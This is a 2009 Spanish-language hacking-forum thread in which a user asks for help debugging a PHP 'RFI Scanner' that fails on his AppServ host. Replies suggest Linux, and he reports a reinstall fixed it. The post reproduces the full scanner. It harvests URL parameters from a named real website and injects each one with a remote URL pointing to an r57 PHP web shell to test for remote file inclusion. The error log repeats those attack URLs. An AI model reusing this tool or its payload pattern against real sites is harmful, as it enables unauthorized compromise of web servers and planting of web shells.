elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  Problemas con interpretación de php en appserv.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problemas con interpretación de php en appserv.  (Leído 3,662 veces)
Yeshua


Desconectado Desconectado

Mensajes: 373


Continuamente aprendiendo


Ver Perfil
Problemas con interpretación de php en appserv.
« en: 18 Marzo 2009, 14:58 pm »

Hola, que tal, a ver si me pudieran echar una mano, se los agradeceria mucho. Verán. Estoy probando a montar un escaner rfi para investigar sobre esto en mi host. El host tiene montado el appserv 2.5.9, aunque también probé con otras versiones. El codigo de php lo cogí de una web, anda bien, ya que lo he probado en otros host y funciona perfecto, pero en el mio me salen errores... creo que debe de ser por la versión del php (si me reconoce otras web en php con codes más simples, depende de las funciones creo). El caso es que en otro host con la misma versión de appserv si que anda pero en la mia no  :-\.

El code es este por si lo quieren probar:

Código
  1. <html>
  2. <bogy>
  3.  
  4. <?
  5. /*
  6. RFI Scanner 1.0
  7. Author: elefrEn
  8. Website: http://elefren.com/
  9. email: efnworkz@hotmail.com
  10.  
  11. Dedicated to Spanish Hackers Team - http://spanish-hackers.com/
  12. Gr33tz: -> JosS | nhh-32 | Omega <-
  13. */
  14.  
  15.  
  16. #Config
  17. $urlweb = "http://www.aeev.net";# Out http://, ex: google.com
  18. $urlshell = "http://xxxxxxxxxxx/shell/r57.txt";# Url where you sent the shell script
  19. $comunvars = "cual|admindir|sec|id|file|doc|module|modulo|name";# Comun vars vulns to RFI in cms´s, etc...
  20. $filetoscan = "index.php";# The file that you want scan
  21.  
  22. #Funcs
  23. function vars($url){
  24. $xpl = parse_url($url);$xpl = $xpl[query];$xpl = explode("&",$xpl);
  25. $var = 0;
  26. while($var < count($xpl)){
  27. $v4r = explode("=",$xpl[$var]);
  28. $m0s .= '|'.$v4r[0];
  29. $var++;
  30. }
  31. $m0s = str_replace('amp;','',$m0s);
  32. return $m0s;
  33. }
  34. function beerres($list, $barras = FALSE){
  35. $s3p4 = '<br>';
  36. if($barras) $s3p4 = '|';
  37. $list = explode('|',$list);
  38. $var = 0;
  39. while($var < count($list)){
  40. if($list[$var] != ''){
  41. if(!@preg_match("/$list[$var]/i",$m0s) ){
  42. $m0s .= $list[$var].$s3p4;
  43. }
  44. }
  45. $var++;
  46. }
  47. return $m0s;
  48. }
  49. function extrac($n00b, $file = FALSE){
  50. $n0ob = 'http://'.$n00b;
  51. $source = join("",file(&$n0ob));
  52. $vars = preg_match_all('/<a href="'.$file.'(.*)">(.*)<\/a>/i',$source,$results);
  53. $t0t = count($results[1]);
  54. $var = 0;
  55. while($var < $t0t){
  56. $xtr = explode('"',$results[1][$var]);
  57. $urllist .= $xtr[0].'|';
  58. $varlist .= vars($xtr[0]);
  59. $var++;
  60. }
  61. $m0s .= $varlist;
  62. return beerres($m0s,1);
  63. }
  64. function rfi($vars,$web,$file,$urlshell){
  65. $list = explode('|',$vars);
  66. $var = 0;
  67. while($var < count($list)){
  68. $url = $web.$file."?".$list[$var]."=".$urlshell."?";
  69. $source = join("",file(&$url));
  70. if(preg_match("/shell/i",$source)){
  71. $m0s .= "<font color=red><b>RFI-></b></font> ";
  72. }else{
  73. $m0s .= "<font color=green><b>Secure-></b></font> ";
  74. }
  75. $m0s .= $url.'<br>';
  76. $var++;
  77. }
  78. return $m0s;
  79. }
  80.  
  81. #Exec
  82. echo rfi(extrac($urlweb).$comunvars,'http://'.$urlweb.'/',$filetoscan,$urlshell);
  83. ?>
  84. </body>
  85.  
  86.  

Los errores son estos:

Código
  1. Warning: file() [function.file]: php_network_getaddresses: getaddrinfo failed: Host desconocido. in C:\AppServ\www\www2\shell\scannerrfi.php on line 52
  2.  
  3. Warning: file(http://http://www.aeev.net) [function.file]: failed to open stream: No error in C:\AppServ\www\www2\shell\scannerrfi.php on line 52
  4.  
  5. Warning: join() [function.join]: Bad arguments. in C:\AppServ\www\www2\shell\scannerrfi.php on line 52
  6.  
  7. Warning: file() [function.file]: php_network_getaddresses: getaddrinfo failed: Host desconocido. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70
  8.  
  9. Warning: file(http://http://www.aeev.net/index.php?cual=http://xxxxxxxxxxxxxxx/shell/r57.txt?) [function.file]: failed to open stream: No error in C:\AppServ\www\www2\shell\scannerrfi.php on line 70
  10.  
  11. Warning: join() [function.join]: Bad arguments. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70
  12.  
  13. Warning: file() [function.file]: php_network_getaddresses: getaddrinfo failed: Host desconocido. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70
  14.  
  15. Warning: file(http://http://www.aeev.net/index.php?admindir=http://xxxxxxxxxxxxxx.org/shell/r57.txt?) [function.file]: failed to open stream: No error in C:\AppServ\www\www2\shell\scannerrfi.php on line 70
  16.  
  17. Warning: join() [function.join]: Bad arguments. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70
  18.  
  19. Warning: file() [function.file]: php_network_getaddresses: getaddrinfo failed: Host desconocido. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70
  20.  
  21. Warning: file(http://http://www.aeev.net/index.php?sec=http://xxxxxxxxxx.org/shell/r57.txt?) [function.file]: failed to open stream: No error in C:\AppServ\www\www2\shell\scannerrfi.php on line 70
  22.  
  23. Warning: join() [function.join]: Bad arguments. in C:\AppServ\www\www2\shell\scannerrfi.php on line 70

Laa linea 52 contiene esto: function extrac($n00b, $file = FALSE){
Y la 70: $var = 0;

Así unas cuantas de veces asta llegar al final de la web donde ya me sale lo que debería de salir, aunque dan mal el resultado... por los errores supongo.

Espero su ayuda, gracias de antemano.

Saludos


En línea


Yeshua


Desconectado Desconectado

Mensajes: 373


Continuamente aprendiendo


Ver Perfil
Re: Problemas con interpretación de php en appserv.
« Respuesta #1 en: 18 Marzo 2009, 15:01 pm »

postee sin quere 2 veces y no soy capaz de quitarlo, asique aprovecho este 2º para decir que la versión de php es la 5.2.3


« Última modificación: 18 Marzo 2009, 16:23 pm por Yeshua » En línea


дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.110


Ver Perfil WWW
Re: Problemas con interpretación de php en appserv.
« Respuesta #2 en: 19 Marzo 2009, 18:14 pm »

Prueba hacerlo en un linux.
En línea

Yeshua


Desconectado Desconectado

Mensajes: 373


Continuamente aprendiendo


Ver Perfil
Re: Problemas con interpretación de php en appserv.
« Respuesta #3 en: 20 Marzo 2009, 03:01 am »

Todo solucionado... fue tan facil como reinstalar y no elegir la opcion de phpadmin ni mysql... supongo qe será por el php admin...

Gracias igual.
En línea


Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemas con el AppServ para Windows 7
PHP
demon 2 6,488 Último mensaje 22 Febrero 2011, 17:03 pm
por Nakp
Demostrada la falsedad de una interpretación común del principio de ...
Noticias
wolfbcn 0 2,120 Último mensaje 16 Septiembre 2012, 15:15 pm
por wolfbcn
[Solucionado] Interpretación del log de HijackThis
Seguridad
arquiella 4 4,248 Último mensaje 3 Agosto 2013, 22:10 pm
por arquiella
Curso de interpretación de sueños « 1 2 »
Foro Libre
Interpretación de sueños 14 8,372 Último mensaje 23 Julio 2021, 04:39 am
por WHK
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines